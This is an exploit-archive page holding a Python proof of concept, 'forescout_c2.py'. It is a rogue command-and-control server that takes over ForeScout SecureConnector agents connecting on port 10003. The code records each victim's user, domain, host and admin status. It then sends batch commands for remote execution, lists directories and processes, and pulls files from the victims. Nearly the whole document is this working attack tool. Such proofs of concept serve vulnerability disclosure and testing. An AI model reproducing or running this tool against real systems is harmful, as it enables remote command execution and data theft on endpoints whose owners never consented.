4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / forescout_c2.py PY
import datetime
import asyncio
import ssl
import xml.etree.ElementTree as ET
import io
import base64
import queue
import socket

from prompt_toolkit.shortcuts import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.patch_stdout import patch_stdout
from prompt_toolkit.completion import PathCompleter
from prompt_toolkit.completion import NestedCompleter
from prompt_toolkit.completion import WordCompleter
from prompt_toolkit.completion import Completer
from prompt_toolkit.completion import Completion
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit import print_formatted_text as print

from functools import reduce

agents = dict()
current_id = None
quit = False
agent_completer : WordCompleter = None
server : asyncio.Server

def generate_cmd(cmd):
    return bytearray('{:0>4}:'.format(len(cmd)) + cmd + '0000:', 'utf8')

def generate_processes(id : int):
    return generate_cmd('<FSAGENT_REQ><COMMANDS><COMMAND id="%d"><PROCESSES/></COMMAND></COMMANDS></FSAGENT_REQ>' % (id))


def generate_files_in_dir(dir : str, id : int):
    return generate_cmd('<FSAGENT_REQ><COMMANDS><COMMAND id="%d"><FILES_IN_DIR><FULL_PATH>%s</FULL_PATH></FILES_IN_DIR></COMMAND></COMMANDS></FSAGENT_REQ>' % (id,dir))

def generate_exec(command : str, id : int):
    return generate_cmd('<FSAGENT_REQ><COMMANDS><COMMAND id="%d"><SCRIPT max_time="10000" wait="1" language="BATCH"><BODY><![CDATA[%s]]></BODY><COMMAND_LINE>  </COMMAND_LINE></SCRIPT></COMMAND></COMMANDS></FSAGENT_REQ>' % (id,command))

def generate_get_file(file : str, id : int):
    file = file.lstrip()
    return generate_cmd('<FSAGENT_REQ><COMMANDS><COMMAND id="%d"><GET_FILE type="BINARY"><PATH>%s</PATH></GET_FILE></COMMAND></COMMANDS></FSAGENT_REQ>' % (id, file))

def parse_message(raw_msg):
    file = io.StringIO(str(raw_msg,'utf8'))
    tree = ET.parse(file)
    root = tree.getroot()
    message = dict()

    message['type'] = root.tag

    if message['type'] == 'FSAGENT_INIT':
        message['id'] = root.attrib['mac_address']
        message['user'] = str(base64.b64decode(root.attrib['user'])[0:-1], 'utf8')
        message['domain'] = str(base64.b64decode(root.attrib['domain'])[0:-1], 'utf8')
        message['host'] = str(base64.b64decode(root.attrib['hostname'])[0:-1], 'utf8')
        message['admin'] = root.attrib['admin']
    elif message['type'] == 'FSAGENT_RESP': 
        if (command := root.find('COMMAND')) is not None:
            message['type'] = 'command'
            if (dir_list := command.find('FILES_IN_DIR')) is not None:                
                message['command'] = 'dir'
                message['files'] = list()
                for file in dir_list.findall('FILE'):
                    message['files'].append(file.text)
            elif (script := command.find('SCRIPT')) is not None:
                message['command'] = 'shell'
                if(output := script.find('OUTPUT')):
                    message['output'] = output.text
                else:
                    message['output'] = ''
            elif (getfile := command.find('GET_FILE')) is not None:
                if(filebody := getfile.find('BODY')) is not None:
                    data = bytearray.fromhex(filebody.text)
                    message['command'] = 'getfile'
                    message['content'] = data
            elif(processes := command.find('PROCESSES')) is not None:
                    message['command'] = 'ps'
                    message['processes'] = list()
                    for process in processes.findall('.//PROCESS'):
                        message['processes'].append(process.attrib['name'])


      
                                    
    return message

def update_agents():

    global agent_completer
    agent_ids = []
    agent_meta = dict()
    for agent in agents.values():
        agent_ids.append(agent['id'])
        agent_meta[agent['id']] = "%s@%s" % (agent['user'], agent['host'])

    if agent_completer is None:
        agent_completer = WordCompleter(
            agent_ids,
            meta_dict=agent_meta,
            ignore_case=True)
    else:
        agent_completer.words=agent_ids
        agent_completer.meta_dict=agent_meta

def execute_agent_command(command, args, current_id):

    command_obj = (command, args)
    
    if current_id in agents.keys():
        agents[current_id]['commands'].put(command_obj)


async def handle_client(reader, writer):
    global quit
    client_id = None
    
    try:
        while(not quit):
            message = None          
            try:                
                size_str = await asyncio.wait_for(reader.readexactly(5), 1)

                if(len(size_str) == 0):
                    break

                size = int(str(size_str[0:4],'ascii'))                                                
                message_data = await reader.readexactly(size)  

                if size > 0:
                    message = parse_message(message_data)  

                    if(message['type'] == 'FSAGENT_INIT'):
                        if message['id'] not in agents.keys():
                            agents[message['id']] = {'id': message['id'], 'commands': queue.Queue(),  'host': message['host'], 'user': message['user'], 'domain': message['domain'], 'admin': message['admin'], 'command_id':0}     
                            update_agents()
                            print("Agent {} ({}@{}) connected".format(message['id'], message['user'], message['host']))
                        client_id = message['id']
                        writer.write(generate_cmd('<FSAGENT_CNFG POLLING_TIME="10"></FSAGENT_CNFG>'))
                    elif message['type'] == 'command':
                        if message['command'] == 'dir':
                            for file in message['files']:
                                print(file)
                        elif message['command'] == 'shell':
                            print('Command executed')
                            print(message['output']) 
                        elif message['command'] == 'getfile':
                            bp = 1
                        elif message['command'] == 'ps':
                            for process in message['processes']:
                                print(process)
                    
            except asyncio.TimeoutError:
                pass

            if client_id is not None and agents[client_id]['commands'].empty() == False:

                command = agents[client_id]['commands'].get()
                agents[client_id]['command_id'] = agents[client_id]['command_id'] + 1
                if(command[0] == 'dir'):
                    if(len(command[1]) == 0):
                        writer.write(generate_files_in_dir('c:\\*', agents[client_id]['command_id']))
                    else:
                        writer.write(generate_files_in_dir(command[1][0], agents[client_id]['command_id']))
                elif(command[0] == 'shell'):
                    writer.write(generate_exec(reduce(lambda a,b: a + ' ' + b, command[1], ''), agents[client_id]['command_id'])) 
                elif(command[0] == 'get'):
                    writer.write(generate_get_file(reduce(lambda a,b: a + ' ' + b, command[1], ''), agents[client_id]['command_id']))
                elif(command[0] == 'ps'):
                    writer.write(generate_processes(agents[client_id]['command_id']))

    except socket.error as e:
        pass
                                                                                                                                              
    except Exception as e:
        print("Error on agent thread: ", e)
                
    
async def run_server():

    global quit, server

    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    context.verify_mode = ssl.CERT_NONE
    context.load_cert_chain(keyfile='key.pem', certfile='server.pem')
    context.set_ciphers('ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA:ECDHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA256:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:DES-CBC3-SHA')

    addr = ('0.0.0.0', 10003)
    server = asyncio.start_server(handle_client, *addr, ssl=context)
    await server

def get_toolbar():

    agent_info = ''

    if current_id is not None and current_id in agents.keys():
        agent = agents[current_id]
        agent_info = "%s@%s: " % (agent['user'], agent['host'])

    return HTML("<span>%s</span>       <span>%s</span>" % (datetime.datetime.now().ctime(), agent_info))


async def interactive_shell():

    global current_id, quit, agent_completer, server

    path_completer = PathCompleter()

    update_agents()

    commands_completer = NestedCompleter.from_nested_dict(
        {
            "use": agent_completer,
            "init": None,
            "dir": None,
            "shell": None,
            "ps": None  
        }
    )

    suggester = AutoSuggestFromHistory()
    our_history = FileHistory("history.txt")
    session = PromptSession("ForeScout C2> ", history=our_history, completer=commands_completer, complete_while_typing=True, auto_suggest=suggester)

    style = Style.from_dict(
        {
            "bottom-toolbar": "#ffffff bg:#000000",
            "bottom-toolbar.text": "#ffffff bg:#000000",
        }
    )

    current_prompt = 'ForeScout C2> '

    while True:
        line = await session.prompt_async(current_prompt, bottom_toolbar=get_toolbar, refresh_interval=0.5, style=style)
        args = line.split(' ')
        command = args[0]
        args = args[1:]

        if command == 'use':
            id = args[0]
            current_id = id                         
        elif command == 'quit':
            quit = True
            server.close()
            return
        else:
            if current_id is not None and command != '':
                execute_agent_command(command, args, current_id)


async def main():

    try:
        with patch_stdout():
            await asyncio.gather(interactive_shell(), run_server())
            print("Quitting event loop. Bye.")
    except Exception as e:
        print(e)



if __name__ == "__main__":

    try:
        from asyncio import run
    except ImportError:
        asyncio.run_until_complete(main())
    else:
        asyncio.run(main())